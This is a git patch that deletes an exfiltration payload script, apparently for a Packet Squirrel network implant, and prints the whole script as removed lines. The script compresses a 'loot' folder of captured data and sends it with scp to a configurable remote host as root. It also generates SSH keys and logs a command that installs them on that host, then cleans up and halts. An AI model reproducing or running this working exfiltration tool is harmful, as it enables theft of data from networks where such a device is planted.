From c9b9a406a04703d610448615e3c519b48728c51f Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Sat, 15 Dec 2018 16:19:06 -0800 Subject: [PATCH] Delete payload.sh --- payloads/library/exfiltration/payload.sh | 204 ----------------------- 1 file changed, 204 deletions(-) delete mode 100644 payloads/library/exfiltration/payload.sh diff --git a/payloads/library/exfiltration/payload.sh b/payloads/library/exfiltration/payload.sh deleted file mode 100644 index 07f3633..0000000 --- a/payloads/library/exfiltration/payload.sh +++ /dev/null @@ -1,204 +0,0 @@ -#!/bin/bash -# -# Title: FreeDaNutz - -# Description: This payload will compress the loot folder and then send that file to a remote server via scp - -# Author: infoskirmish.com -# Version: 1.0 -# Category: exfiltration -# Target: Any -# Net Mode: NAT - -# LEDs -# FAIL: This payload will LED FAIL (blink RED) for the following reasons -# No USB storage found -# Cannot send files to remote host -# Cannot ping remote host - -# ATTACK: Setting NAT: Blink Yellow -# Compressing: Rapid Cyan -# Sending: Rapid Magenta -# Cleaning up: Rapid White - -# SUCCESS: LED goes off - -exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to. -exfilhostuser="root" # The username of the account for the above hostname -sshport="22" # Port to send data out on -exfilfile="backup.tar.gz" # The name of the compressed loot folder -identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel -remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine. -exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent) -lootfolderpath="/mnt/loot" # Path to loot folder -payloadlogpath="/mnt/loot/freedanutz" # Path to store payload log file - - -# The main run function. -# Inputs: None -# Returns: None -# Upon success it will call the finish() function to shutdown. -function run() { - - # Create log directory - # We store the tarball on /mnt outside the /mnt/loot folder in order to make sure we do not use up all the limited space on the device itself. - if [ ! -d $payloadlogpath ]; then - - # If log path does not exisit then we should create it. - mkdir -p $payloadlogpath &> /dev/null - fi - - # Set networking to NAT mode and wait eight seconds - NETMODE NAT - sleep 8 - - # If we cannot reach the server we want to send our data to then there is no point in going any further. - ping $exfilhost -w 3 &> /dev/null - pingtest=$? - if [ $pingtest -ne 0 ]; then - debugdata - fail "FATAL ERROR: Cannot reach $exfilhost" - fi - - # Let's test to make sure scp keys are set up correclty and we can send files before we send loot. - testssh - - # Start blinking LED Cyan very fast to indicate compressing is in progress. - LED C VERYFAST - - # Compress the loot folder - echo "tar -czf $exfilfilepath $lootfolderpath" >> $payloadlogpath/log.txt - tar -czf $exfilfilepath $lootfolderpath &> /dev/null - - # Start blinking LED Magenta very fast to indicate sending is in progress. - LED M VERYFAST - - # Send compress file out into the world. - echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt - scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath &> /dev/null - - # Clean up - finish -} - - - -# A function to clean up files and safely shutdown -# Inputs: None -# Returns: None -function finish() { - - # Remove the file we have sent out as it is no longer needed and just taking up space. - echo "Removing $exfilfilepath" >> $payloadlogpath/log.txt - rm $exfilfilepath - sync - - # Halt the system; turn off LED - LED OFF - halt -} - - - -# A function to test if the payload can send files to the remote host. -# Inputs: None -# Returns: None -# On test fail will abort script. -function testssh() { - - # Create test file. - touch $exfilfilepath.test - scp -P $sshport -C -i $identityfile $exfilfilepath.test $exfilhostuser@$exfilhost:$remotepath &> /dev/null - error=$? - - if [ $error -ne 0 ]; then - - # We could not send test file; this is a fatal error. - rm $exfilfilepath.test - debugdata - fail "FATAL ERROR: Could not access and/or login to $exfilhostuser@$exfilhost remove path = $remotepath" - - else - # Be nice and try to remove the test file we uploaded. - ssh $exfilhostuser@$exfilhost 'rm $remotepath.test' - rm $exfilfilepath.test - fi - -} - - - -# A function to standardize how fatal errors fail. -# Inputs: $1:Error message -# Returns: None -# This will abort the script. -function fail() { - - LED FAIL - echo $1 >> $payloadlogpath/log.txt - sync - halt - -} - - - -# A function to dump data to aid in trouble shooting problems. -# Inputs: None -# Returns: None -function debugdata() { - - echo "=== DEBUG DATA ===" >> $payloadlogpath/log.txt - ifconfig >> $payloadlogpath/log.txt - echo "=== Scp Command ===" >> $payloadlogpath/log.txt - echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt - echo "=== Tar Command ===" >> $payloadlogpath/log.txt - echo "tar -czf $exfilfilepath $lootfolderpath &> /dev/null" >> $payloadlogpath/log.txt - echo "=== Public Key Dump ===" >> $payloadlogpath/log.txt - cat $identityfile.pub >> $payloadlogpath/log.txt - echo "=== Network Config Dump ===" >> $payloadlogpath/log.txt - cat /etc/config/network >> $payloadlogpath/log.txt - echo "=== Ping $exfilhost Results ===" >> $payloadlogpath/log.txt - echo "If there is no data it likely means that $exfilhost is a bad address." >> $payloadlogpath/log.txt - ping $exfilhost -w 3 >> $payloadlogpath/log.txt - echo "=== lsusb Dump ===" >> $payloadlogpath/log.txt - lsusb >> $payloadlogpath/log.txt -} - - - -# Zero out payload log file. -echo "" > $payloadlogpath/log.txt - -# This payload will only run if we have USB storage -if [ -d "/mnt/loot" ]; then - - # Check to see if the .ssh folder exists. If it does not exist then create it. - if [ ! -d "/root/.ssh" ]; then - - # If it doesn't then we need to create it. - echo "Warning: /root/.ssh folder did not exits. We created it." >> $payloadlogpath/log.txt - mkdir -p /root/.ssh &> /dev/null - - fi - - # Check if identity file exists. If not create it. - if [ ! -f $identityfile ]; then - - # We need to log a warning that since the identify file was not found then this payload likely will fail. This payload will give the user a likely way to fix this problem. - echo "Warning: We had to create $identityfile" >> $payloadlogpath/log.txt - echo "To complete setup you'll likely need to run this command on the squirrel (make sure when you do your squirrel can access $exfilhost)" >> $payloadlogpath/log.txt - echo "cat $identityfile.pub | ssh $exfilhostuser@$exfilhost 'cat >> .ssh/authorized_keys'" >> $payloadlogpath/log.txt - ssh-keygen -t rsa -N "" -f $identityfile - fi - - LED ATTACK - run -else - - # USB storage could not be found; log it in ~/payload/switch1/log.txt - payloadlogpath="log.txt" - debugdata - fail "Could not load USB storage. Stopping..." - -fi